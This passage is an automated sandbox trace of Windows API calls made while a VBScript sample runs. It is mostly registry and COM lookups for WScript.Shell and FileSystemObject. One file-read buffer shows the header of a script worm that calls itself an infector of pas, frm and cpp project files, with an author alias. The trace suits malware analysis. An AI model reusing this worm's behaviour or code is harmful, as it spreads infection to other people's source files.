| 19:40:26,383 | 252 | RegOpenKeyExA | Handle => 0x000001a0 Registry => 0x0000019c SubKey => EncodingType 1 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExA | Handle => 0x00000000 Registry => 0x000001a0 SubKey => CryptSIPDllGetSignedDataMsg | FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegCloseKey | Handle => 0x000001a0 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegEnumKeyExA | Index => 2 Handle => 0x0000019c Name => EncodingType 1 Class => | FAILURE | 0x00000103 | |
| 19:40:26,383 | 252 | RegCloseKey | Handle => 0x0000019c | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => GetSignedDataMsg FunctionAddress => 0x7dfa1be9 ModuleHandle => 0x7dfa0000 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | NtQueryInformationFile | FileHandle => 0x0000019c FileInformation => \x000\x00\x00\x00\x00\x00\x00\xcc$\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | NtSetInformationFile | FileHandle => 0x0000019c FileInformation => | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | NtReadFile | Buffer => Rem VBS.W32.I-worm.Vabian<br>Rem Script Project Infector [pas,frm,cpp]<br>Rem By Psychologic aka Puppy<br>Rem Mailto : Psychologic@hotmail.com<br>'sending filename<br>'x=msgbox(Wscript.ScriptName, 0, "Title")<br>'malware expires....<br>date2 = #06/01/2018#<br>date1 = FileHandle => 0x0000019c | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x000001a0 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegQueryValueExW | Handle => 0x000001a0 Data => ValueName => REGDBVersion | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey | Handle => 0x000001a0 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x000001a0 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegQueryValueExW | Handle => 0x000001a0 Data => ValueName => REGDBVersion | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey | Handle => 0x000001a0 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x000001a2 Registry => 0x000000f2 SubKey => CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC} | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000001a2 SubKey => TreatAs | FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x000001a6 Registry => 0x000000f2 SubKey => | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey | Handle => 0x000001a2 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x000001a2 Registry => 0x000001a6 SubKey => CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC} | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x000001aa Registry => 0x000001a2 SubKey => InprocServer32 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegQueryValueExW | Handle => 0x000001aa DataLength => 1000 ValueName => InprocServer32 Type => 1581080 | FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegCloseKey | Handle => 0x000001aa | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000001a2 SubKey => InprocServerX86 | FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000001a2 SubKey => LocalServer32 | FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x000001aa Registry => 0x000001a2 SubKey => InprocServer32 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegQueryValueExW | Handle => 0x000001aa Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00s\x00c\x00r\x00o\x00b\x00j\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey | Handle => 0x000001aa | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000001a2 SubKey => InprocHandler32 | FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000001a2 SubKey => InprocHandlerX86 | FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000001a2 SubKey => LocalServer32 | FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000001a2 SubKey => LocalServer | FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x000001aa Registry => 0x000001a6 SubKey => CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC} | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegQueryValueExW | Handle => 0x000001aa DataLength => 100 ValueName => AppID Type => 1305712 | FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegCloseKey | Handle => 0x000001aa | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey | Handle => 0x000001a2 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x000001a2 Registry => 0x000001a6 SubKey => CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC} | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x000001aa Registry => 0x000001a2 SubKey => InprocServer32 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegQueryValueExW | Handle => 0x000001aa Data => A\x00p\x00a\x00r\x00t\x00m\x00e\x00n\x00t\x00\x00\x00 ValueName => ThreadingModel | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey | Handle => 0x000001aa | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey | Handle => 0x000001a2 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x000001a2 Registry => 0x80000000 SubKey => CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC} | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000001a2 SubKey => TreatAs | FAILURE | 0x00000002 | |
| 19:40:26,383 | 252 | RegCloseKey | Handle => 0x000001a2 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | LdrLoadDll | Flags => 1302488 BaseAddress => 0x5ce40000 FileName => C:\WINDOWS\system32\scrobj.dll | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => DllGetClassObject FunctionAddress => 0x5ce424c0 ModuleHandle => 0x5ce40000 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => DllCanUnloadNow FunctionAddress => 0x5ce4180e ModuleHandle => 0x5ce40000 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | NtQueryInformationFile | FileHandle => 0x00000174 FileInformation => \x000\x00\x00\x00\x00\x00\x00\xcc$\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | NtCreateSection | ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x0000019c FileHandle => 0x00000174 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | ZwMapViewOfSection | SectionOffset => 0x0013f220 SectionHandle => 0x0000019c ProcessHandle => 0xffffffff BaseAddress => 0x00f60000 | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | NtOpenKey | DesiredAccess => 131097 KeyHandle => 0x0000019c ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003 | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegOpenKeyExW | Handle => 0x000001a0 Registry => 0x0000019c SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegCloseKey | Handle => 0x0000019c | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegQueryValueExW | Handle => 0x000001a0 Data => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00c\x00u\x00c\x00k\x00o\x00o\x00\\x00L\x00o\x00c\x00a\x00l\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00T\x00e\x00m\x00p\x00o\x00r\x00a\x00r\x00y\x00 \x00I\x00n\x00t\x00e\x00r\x00n\x00e\x00t\x00 \x00F\x00i\x00l\x00e\x00s\x00\x00\x00 ValueName => Cache | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegCloseKey | Handle => 0x000001a0 | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | NtOpenKey | DesiredAccess => 1 KeyHandle => 0x00000174 ObjectAttributes => \Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | NtQueryValueKey | KeyHandle => 0x00000174 ValueName => LogFileName | FAILURE | 0xc0000034 | |
| 19:40:26,393 | 252 | NtOpenKey | DesiredAccess => 3 KeyHandle => 0x00000000 ObjectAttributes => \Registry\MACHINE\System\CurrentControlSet\Control\SafeBoot\Option | FAILURE | 0xc0000034 | |
| 19:40:26,393 | 252 | LdrLoadDll | Flags => 1306164 BaseAddress => 0x7c800000 FileName => C:\WINDOWS\system32\kernel32.dll | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => NlsGetCacheUpdateCount FunctionAddress => 0x7c835831 ModuleHandle => 0x7c800000 | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | LdrGetDllHandle | ModuleHandle => 0x7c800000 FileName => kernel32.dll | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => GetCalendarInfoW FunctionAddress => 0x7c839038 ModuleHandle => 0x7c800000 | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | NtOpenKey | DesiredAccess => 33554432 KeyHandle => 0x00000174 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003 | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | NtOpenKey | DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => Software\Policies\Microsoft\Control Panel\International\Calendars\TwoDigitYearMax | FAILURE | 0xc0000034 | |
| 19:40:26,393 | 252 | NtOpenKey | DesiredAccess => 33554432 KeyHandle => 0x00000174 ObjectAttributes => \REGISTRY\USER\S-1-5-21-1960408961-789336058-1343024091-1003 | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | NtOpenKey | DesiredAccess => 131097 KeyHandle => 0x00000000 ObjectAttributes => Control Panel\International\Calendars\TwoDigitYearMax | FAILURE | 0xc0000034 | |
| 19:40:26,393 | 252 | NtFreeVirtualMemory | FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00007000 BaseAddress => 0x0163a000 | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | NtFreeVirtualMemory | FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x01631000 | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | LdrGetDllHandle | ModuleHandle => 0x774e0000 FileName => ole32.dll | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => CreateErrorInfo FunctionAddress => 0x77546b49 ModuleHandle => 0x774e0000 | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => GetErrorInfo FunctionAddress => 0x7752993a ModuleHandle => 0x774e0000 | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => SetErrorInfo FunctionAddress => 0x774feeaa ModuleHandle => 0x774e0000 | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegOpenKeyExW | Handle => 0x00000174 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegQueryValueExW | Handle => 0x00000174 Data => ValueName => REGDBVersion | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegCloseKey | Handle => 0x00000174 | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegOpenKeyExW | Handle => 0x00000176 Registry => 0x80000000 SubKey => WScript.Shell | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegOpenKeyExW | Handle => 0x000001a2 Registry => 0x00000176 SubKey => CLSID | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegQueryValueExW | Handle => 0x000001a2 Data => {\x007\x002\x00C\x002\x004\x00D\x00D\x005\x00-\x00D\x007\x000\x00A\x00-\x004\x003\x008\x00B\x00-\x008\x00A\x004\x002\x00-\x009\x008\x004\x002\x004\x00B\x008\x008\x00A\x00F\x00B\x008\x00}\x00\x00\x00 ValueName => | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegCloseKey | Handle => 0x00000176 | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegOpenKeyExW | Handle => 0x00000174 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegQueryValueExW | Handle => 0x00000174 Data => ValueName => REGDBVersion | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegCloseKey | Handle => 0x00000174 | SUCCESS | 0x00000000 | |
| 19:40:26,393 | 252 | RegOpenKeyExW | Handle => 0x00000174 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegQueryValueExW | Handle => 0x00000174 Data => ValueName => REGDBVersion | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey | Handle => 0x00000174 | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x00000176 Registry => 0x000000f2 SubKey => CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x00000176 SubKey => TreatAs | FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x000001a2 Registry => 0x000000f2 SubKey => | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey | Handle => 0x00000176 | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x00000174 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegQueryValueExW | Handle => 0x00000174 Data => ValueName => REGDBVersion | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey | Handle => 0x00000174 | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x00000174 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegQueryValueExW | Handle => 0x00000174 Data => ValueName => REGDBVersion | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey | Handle => 0x00000174 | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x00000176 Registry => 0x000000f2 SubKey => CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x00000176 SubKey => TreatAs | FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x0000019e Registry => 0x000000f2 SubKey => | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey | Handle => 0x00000176 | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x00000176 Registry => 0x0000019e SubKey => CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x000001aa Registry => 0x00000176 SubKey => InprocServer32 | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegQueryValueExW | Handle => 0x000001aa DataLength => 1000 ValueName => InprocServer32 Type => 1581080 | FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegCloseKey | Handle => 0x000001aa | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x00000176 SubKey => InprocServerX86 | FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x00000176 SubKey => LocalServer32 | FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x000001aa Registry => 0x00000176 SubKey => InprocServer32 | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegQueryValueExW | Handle => 0x000001aa Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00o\x00m\x00.\x00o\x00c\x00x\x00\x00\x00 ValueName => | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey | Handle => 0x000001aa | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x00000176 SubKey => InprocHandler32 | FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x00000176 SubKey => InprocHandlerX86 | FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x00000176 SubKey => LocalServer32 | FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x00000176 SubKey => LocalServer | FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x000001aa Registry => 0x0000019e SubKey => CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegQueryValueExW | Handle => 0x000001aa DataLength => 100 ValueName => AppID Type => 1305380 | FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegCloseKey | Handle => 0x000001aa | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey | Handle => 0x00000176 | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x00000176 Registry => 0x0000019e SubKey => CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey | Handle => 0x00000176 | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x00000176 Registry => 0x0000019e SubKey => CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x000001aa Registry => 0x00000176 SubKey => InprocServer32 | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegQueryValueExW | Handle => 0x000001aa Data => A\x00p\x00a\x00r\x00t\x00m\x00e\x00n\x00t\x00\x00\x00 ValueName => ThreadingModel | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey | Handle => 0x000001aa | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegCloseKey | Handle => 0x00000176 | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x00000176 Registry => 0x80000000 SubKey => CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} | SUCCESS | 0x00000000 | |
| 19:40:26,403 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x00000176 SubKey => TreatAs | FAILURE | 0x00000002 | |
| 19:40:26,403 | 252 | RegCloseKey | Handle => 0x00000176 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrLoadDll | Flags => 1302156 BaseAddress => 0x60280000 FileName => C:\WINDOWS\system32\wshom.ocx | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => DllGetClassObject FunctionAddress => 0x60285fe1 ModuleHandle => 0x60280000 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => DllCanUnloadNow FunctionAddress => 0x60285fd7 ModuleHandle => 0x60280000 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrGetProcedureAddress | Ordinal => 1 FunctionName => FunctionAddress => 0x01001905 ModuleHandle => 0x01000000 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrGetDllHandle | ModuleHandle => 0x774e0000 FileName => ole32.dll | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => CLSIDFromProgIDEx FunctionAddress => 0x7755620d ModuleHandle => 0x774e0000 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001b8 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW | Handle => 0x000001b8 Data => ValueName => REGDBVersion | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey | Handle => 0x000001b8 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001ba Registry => 0x80000000 SubKey => scripting.FileSystemObject | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001be Registry => 0x000001ba SubKey => CLSID | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW | Handle => 0x000001be Data => {\x000\x00D\x004\x003\x00F\x00E\x000\x001\x00-\x00F\x000\x009\x003\x00-\x001\x001\x00C\x00F\x00-\x008\x009\x004\x000\x00-\x000\x000\x00A\x000\x00C\x009\x000\x005\x004\x002\x002\x008\x00}\x00\x00\x00 ValueName => | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey | Handle => 0x000001ba | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001b8 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW | Handle => 0x000001b8 Data => ValueName => REGDBVersion | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey | Handle => 0x000001b8 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001b8 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW | Handle => 0x000001b8 Data => ValueName => REGDBVersion | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey | Handle => 0x000001b8 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001ba Registry => 0x000000f2 SubKey => CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228} | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000001ba SubKey => TreatAs | FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001be Registry => 0x000000f2 SubKey => | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey | Handle => 0x000001ba | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001b8 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW | Handle => 0x000001b8 Data => ValueName => REGDBVersion | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey | Handle => 0x000001b8 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001b8 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW | Handle => 0x000001b8 Data => ValueName => REGDBVersion | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey | Handle => 0x000001b8 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001ba Registry => 0x000000f2 SubKey => CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228} | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000001ba SubKey => TreatAs | FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001c2 Registry => 0x000000f2 SubKey => | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey | Handle => 0x000001ba | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001ba Registry => 0x000001c2 SubKey => CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228} | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001c6 Registry => 0x000001ba SubKey => InprocServer32 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW | Handle => 0x000001c6 DataLength => 1000 ValueName => InprocServer32 Type => 1581080 | FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegCloseKey | Handle => 0x000001c6 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000001ba SubKey => InprocServerX86 | FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000001ba SubKey => LocalServer32 | FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001c6 Registry => 0x000001ba SubKey => InprocServer32 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW | Handle => 0x000001c6 Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00s\x00c\x00r\x00r\x00u\x00n\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey | Handle => 0x000001c6 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000001ba SubKey => InprocHandler32 | FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000001ba SubKey => InprocHandlerX86 | FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000001ba SubKey => LocalServer32 | FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000001ba SubKey => LocalServer | FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001c6 Registry => 0x000001c2 SubKey => CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228} | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegQueryValueExW | Handle => 0x000001c6 DataLength => 100 ValueName => AppID Type => 1305976 | FAILURE | 0x00000002 | |
| 19:40:26,413 | 252 | RegCloseKey | Handle => 0x000001c6 | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey | Handle => 0x000001ba | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegOpenKeyExW | Handle => 0x000001ba Registry => 0x000001c2 SubKey => CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228} | SUCCESS | 0x00000000 | |
| 19:40:26,413 | 252 | RegCloseKey | Handle => 0x000001ba | SUCCESS | 0x00000000 | |
